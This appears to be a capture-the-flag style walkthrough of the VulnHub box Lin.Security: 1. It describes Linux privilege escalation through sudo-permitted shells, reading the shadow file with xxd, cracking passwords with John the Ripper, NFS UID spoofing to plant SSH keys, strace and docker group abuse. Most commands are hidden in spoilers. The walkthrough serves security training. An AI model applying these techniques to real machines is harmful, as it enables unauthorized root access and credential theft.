Lin.Security: 1 - VulnHub Box
Box Information
Name: Lin.Security: 1
Release: 11 JUL 2018
Creator: In.security
User Level Difficulty: Easy & Intermediate
Root Level Difficulty: Easy & Intermediate
Table of Contents
Prerequisites
The following topics are beneficial in understanding how this box can be exploited.
- Entry Level Knowledge
Description
This box primarily focuses on poor System Administration practices. It includes lessons where the user already has access to the box and must privilege escalate. It also includes lessons on gaining user level access remotely. It covers a broad range from file level access to services level access. Once this box has been completed, a deeper level of System Administration practices will be understood.
There are a few initial user level access points. This guide will cover the intial access and how to privilege escalte to root permissions.
Privilege Escalation is covered via numerous vulnerabilities. We will cover each one in detail. Note that no previous knowledge will be needed to understand the practices taught in this guide.
Methodologies Used
The following methodologies were used during the exploitation of this box.
- Enumeration
- Port Scanning
- Service Scanning
- Permission Scanning
- Vulnerability Exploitation
- Network File Share (NFS) Weak Permissions
- Public & Private Key Use
- SSH
- Service Use & Capability Understanding
Enumeration
Port Scanning
NMAP
Start off by scanning the ports & services associated with the box. Document the descoveries.
HINT: use NMAP's manual or help menu to find the flags for "TCP" & "Version" scanning.
- Spoiler - NMAP Scan
Service Scanning
NFS Scanning
NFS scanning can sometimes show folders which have been open to the public. Folders which are publically available might host important data. Even worse, there might be a known exploit which could allow a remote user local access.
SHOWMOUNT is a service that queries the mount daemon on a remote host for information about the state of the NFS server on that machine.
| Command Syntax | Screen Shots |
|---|---|
|
|
Become familiar with using showmount to "show the NFS server's export list".
- Spoiler - NFS Scan
Permission Scanning
Group File Permission Scanning
Using LINUX standard commands, any user is able to find/list files & display the persmissions of the files.
To list files us the LS command. Read the manual for ls to become familiar with this service.
| Command Syntax | Screen Shots |
|---|---|
|
|
To find files us the FIND command. Read the manual for FIND to become familiar with this service.
| Command Syntax | Screen Shots |
|---|---|
|
|
You can combine these two services to fine tune the display output. In this example, the file "test.txt" has been created within /home/susan. The file has had it's permissions altered to "777".
| Command Example | Screen Shots |
|---|---|
|
|
Superuser Permissions
On UNIX-like systems, the SUDO service allows a user to operate a command with superuser rights.
| Command Syntax | Screen Shots |
|---|---|
|
|
Finding out if & what SUDO rights a user has access to is one of the most commonly used practices for a penetration tester. Become familiar with how SUDO can be used. It will be used later in this guide.
HINT: use SUDO's manual or help menu to find the flag to "list user's privileges".
- Spoiler - SUDO List
Bob
This box has been delivered with credentials for the user "bob". The focus for the user "bob" is to teach how a penetration tester can enumerate a box they have access to. Hopefully, during this enumeration the penetration tester can either pivot to a different user or elevate to ROOT.
Many of the services the user has access to gives us the desired end goal of our penetration testing (I.E. ROOT access). This user allows you to practice using these services and become familiar with them.
Account details for the user "bob":
ACCOUNT: bob
PASSWORD: secret
GROUPS: 1004(bob)
Boot up the box & log into the box with the provided user credentials.
NOTE: You can either log into the box locally OR log into the box remotely using SSH.
Method 1 - USER to ROOT
In the enumeration section of this guide, enumerating sudo rights was discussed. We'll start off by simply seeing if this user can run commands as ROOT. List the SUDO rights of the user "bob".
NOTE: There will be a password prompt for running SUDO. See if you can figure out the password.
- Spoiler - BOB SUDO List
Immediately we see that the user BOB can run many commands as ROOT using SUDO. The user BOB was also lazy and didn't implement good password security measures.
ASH
ASH, the Almquist shell, is a lightweight Unix shell. It is the clone of the System V.4 variant of the Bourne shell.
- Spoiler - ASH ROOT ACCESS
AWK
Gawk utility interprets a special-purpose programming language that makes it possible to handle simple data-reformatting jobs with just a few lines of code. When reading the manual of Gawk, section 9.1.4 Input/Output Functions explains that Gawk has built in functions. One of the functions "system(argument)" executes the operating system command argument and then returns the output to the Gawk program.
With this understanding, lets see if we can return a ROOT shell to the user BOB when executing the Gawk program. The below example shows the Gawk's syntax.
| Command Syntax | Screen Shots |
|---|---|
|
|
- Spoiler - AWK ROOT ACCESS
BASH
GNU Bash is the GNU Project's shell.
Having SUDO access to BASH is a major security vulnerability. By gaining a BASH, we've accomplished our goal of gaining ROOT access.
- Spoiler - BASH ROOT ACCESS
SH
SH, or the bourne shell, is a command-line interpreter. It is the default shell for Version 7 Unix.
- Spoiler - SH ROOT ACCESS
CSH
CSH, or the C shell, is a command processor. The main focus of a C shell is that it resembles the C programming language.
- Spoiler - CSH ROOT ACCESS
DASH
DASH, the Debian Almquist shell, is focused on POSIX conformance & slim implementation.
- Spoiler - DASH ROOT ACCESS
ED
ENV
ENV is a shell command for UNIX and Unix-like operating systems. It can either print a list of environment variables or run another utility in an altered environment. Read up on the documentation and see if you can get a ROOT shell using ENV commands.
- Spoiler - ENV ROOT ACCESS
EXPECT
EXPECT is another coding language. It is used to automate control of interactive applications such as Telnet, FTP, passwd, fsck, rlogin, tip, SSH, and others.
Expect has a particular function spawn(). Using spawn() it is possible to drive an interactive shell using the job control features.
| Command Syntax | Notes |
|---|---|
|
|
After becoming familiar with EXPECT, see if you can get a ROOT shell using the spawn() function.
- Spoiler - EXPECT ROOT ACCESS
Method 2 - USER to USER
Susan
Sometimes, you are not able to gain immediate ROOT access on a compromised box. However, you might be able to gain the permissions of another user. Maybe this user is part of a group that has permissions to services not available to the current user.
USER accounts normally have personal folders. For example, BOB has the personal folder /home/bob. What other users' folders are we able to see on this box?
HINT: User standard LINUX console commands to LIST the contents of the standard directory for USER folders.
- Spoiler - USER ENUMERATION
After listing the folders, we see that we have both READ (r) & EXECUTABLE (x) access to the other USERS on this box. This means we should be able to see the contents within these folders. Enumerate both users. Remember to list not only normal files/folders but "hidden" files/folders as well.
- Spoiler - CLEAR TEXT PASSWORD
Now that we have found a password in clear text, lets see if it works. Using standard LINUX commands (s)witch (u)ser using the name & password we have found.
- Spoiler - SWITCH USER
Congratulations! We have successfuly ENUMERATED what BOB has access to, found a clear text password being obfuscated, and successfuly gained access to a different USER on the box.
Insecurity
One of the most commonly read files during ENUMERATION is the "/etc/passwd" file. This is because it stores USER information, sometimes even encrypted passwords!
After reading the file, we see 5 actual users:
| Console Commands | Screenshots |
|---|---|
|
|
| USER | PASSWORD ENTRY |
|---|---|
|
|
|
|
|
|
|
|
|
|
Historically, LINUX used to store DES encrypted passwords in the /etc/passwd file. Maybe, with the right arguments, we can use a password cracker to crack this password.
- Spoiler - JOHN DES DECRYPT
Now we have a clear text password for USER "insecurity". This is continued in Insecurity.
Insecurity
With the credentials we discovere during Bob, SSH into the box and run the LINUX "id" command.
| Console Commands | Screenshots |
|---|---|
|
|
Congratulations! Sometimes, privilege escalation is easy as long as we know what we are looking for.
Susan
This account focus teaches a deeper understanding of LOCAL ENUMERATION. We need to fully understand who this USER is. What do they have permission to. Lastly, what group they are part of & what this means.
Account details for the user "susan":
ACCOUNT: susan
PASSWORD: obtained VIA user BOB
GROUPS: 1007(itservices)
In the ENUMERATION section of this guide, we discussed finding & listing files. Maybe we can use a similar method to enumerate all the files on the computer and see if the user OR the group has access to something that we can use to gain ROOT permissions.
HINT: use the GREP command to filter out group: itservices
| Console Syntax | Notes |
|---|---|
|
|
- Spoiler - LIST GROUP ACCESSIBLE FILES/SERVICES
XXD
XXD is a hex dump service. It can read in any file and return the hex dump of the file. Additionally, it can convert HEX back into readable text.
Obtaining direct root access with XXD is not possible. However, the service owner is ROOT and the GROUP itservices has access to use this service. How can a Penetration Tester use a service which returns the hex dump of files it has read?
HINT: Maybe we can have XXD output a file in hex and then convert the hex back into readable text. Maybe a file only ROOT has access to?
- Spoiler - ENCRYPTED PASSWORDS
JOHN THE RIPPER
JOHN THE RIPPER is a popular password cracking tool. Read the manual and become familiar with this service; as, the next part of this guide is focused on cracking passwords we have just discovered.
At this point, you will have to move over to your hacking VM. Extract both Lin.Security 1 PASSWD & Lin.Security 1 SHADOW files over to your hacking VM. Now, combine the files into an "unshadow" file.
- Spoiler - UNSHADOW
Using JOHN we can start to crack the passwords within the unshadow file.
NOTE: Eventually, we will be stuck with 2 hashes which JOHN did not crack.
- Spoiler - JOHN
Now that we have cracked the ROOT password, all that is left is to switch to ROOT.
| Console Commands | Screenshots |
|---|---|
|
|
Congratulations! To recap what we have learned to gain root VIA this method we have done the following:
- Used the USER "bob" to find USER "susan" credentials.
- Enumerated who the USER "susan" is.
- Found & listed services the USER "susan" has access to.
- Converted a ROOT restricted file into HEX and converted the HEX back into a readable file.
- Cracked the encrypted passwords to obtain the ROOT password.
- Gained access to ROOT.
Peter
Peter is going to take everything you have previously learned and more to succesfully hack this route! Time to dive in.
In the ENUMERATION section, we discussed how to display NFS folders that are publically accessible. This can be very dangerous, especially if the folder that is mounted allows a user to find or exploit a known vulnerability.
Attempt to display & mount the publically avaiable folder.
- Spoiler - NFS Show & Mount
Now that the folder has been mounted, we can enumerate the folder. Now, this is where things get a bit tricky. A bit of SSH KEY pair understanding is required to obtain access PETER's account.
---STOP--- Before reading any further, attempt to see if you can figure out how to gain access!
Now that we have a list of the folder contents, the most important thing to understand is that SSH keys are stored in the /home/[user]/.ssh location. However, if you look at the permissions of the folder the USER & GROUP associated with the folder are most likely not the same as the user you are logged into on your hacking VM.
- Spoiler - NFS LIST
USER: 1001
GROUP: 1005
A vulnerability that NFS has, is that it looks at the user's ID & group's ID. It does not matter if the user that is logged into the box is remotely accessing the folder VIA a mounted drive or not. We are going to trick NFS into thinking we are that user.
Read the manual for the USERADD service. Find the argument to specify the User ID.
Read the manual for the GROUPADD service. Find the argument to specify the Group ID.
Read the manual for the USERMOD service.
- Spoiler - NFS ADDUSER
Now that we have a local user created with the same user ID and group ID as the mounted drive's creater & owner, we will need to understand how the SSH key pair work. SSH-KEYGEN is a service that creates a key pair. We can use this service to create the key pair on the hacker box, change user to UID: 1001 GID:1005, upload the public key to the mounted drive, append the key private key to the authorized_keys, and SSH into the box as the user.
Start by making the SSH pair.
- Spoiler - SSH-KEYGEN RSA TOKEN
Next, upload the public key & append the private key to the user's authorized_keys file.
NOTE: this step needs to be done by the user with UID: 1001 & GID: 1005.
NOTE: The private key's permissions need to be updated so all users can read the file, this permission change should be reverted back after appending the contents to authorized_keys.
- Spoiler - Upload the key pair
Once the SSH keypair has been properly uploaded to the mounted drive, we should be able to SSh into the box using the USER name associated with the mounted drive.
NOTE: SSH has an argument to (i)nclude private keys as part of their login.
- Spoiler - SSH Login
Method 1 - STRACE
We have USER access to the box. Now, back to enumeration to see if we can find a way to escalate to ROOT. Refer to the Superuser Permissions section.
- Spoiler - PETER PERMISSIONS
STRACE is a debugging tool in Linux. The thing to note is that when a program is debugged, it is also ran. Maybe we can use this to our advantage. Create a C script which uses a C function to kick off a shell. Refer to my SCRIPTING 101 entry for an introduction on scripting.
After creating the script, build it using GCC.| Console Commands | Screenshots |
|---|---|
|
|
- Spoiler - C PROGRAM
With the script made, all that is left is to upload the file to Lin.Security: 1 box. You can use your prefered method, I typically use SimpleHTTPServer.
| Console Commands | Screenshots |
|---|---|
|
|
Once the script is uploaded to Lin.Security: 1, update the permissions to 777 & debug the script VIA the STRACE service.
- Spoiler - STRACE DEBUG
Congratulations! We have been able to remotely scan this vulnerable box, obtain USER access and finish with ROOT VIA:
- Enumerated the NFS folders.
- Obtained USER name information.
- Mounted the USER's home folder.
- Create & Upload a SSH key pair.
- Enumerated what permissions the USER has access to.
- Used these permissions to debug a script containing malicious code.
- Gained access to ROOT.
Method 2 - DOCKER GROUP
During the ENUMERATION phase for the the USER "peter", it should be noted that the user is part of the "(999) docker" group. Docker is a service to "build, manage and secure your apps anywhere"; or, a lightweight runtime and packaging tool. A major issue & common complaint with Docker is that most commands require sudo prefixing them, much like the proper security practice in Linux. However, some poor practice have become commonplace. That is putting developers into a group that allows them to run Docker with SUDO rights. Well, this includes the ROOT in the GROUP. Exploiting this practice should lead to ROOT level access.
Reading up the manual there are certain flags that can be used to RUN a ROOT shell. See if you can find them to make an interactive high privileged shell.
- Spoiler - DOCKER SHELL
Congratulations! Understanding that even new servcies can be used imporoperly and opening up vulnerabilities to hackers is a great skill to have.
Comments
Post a Comment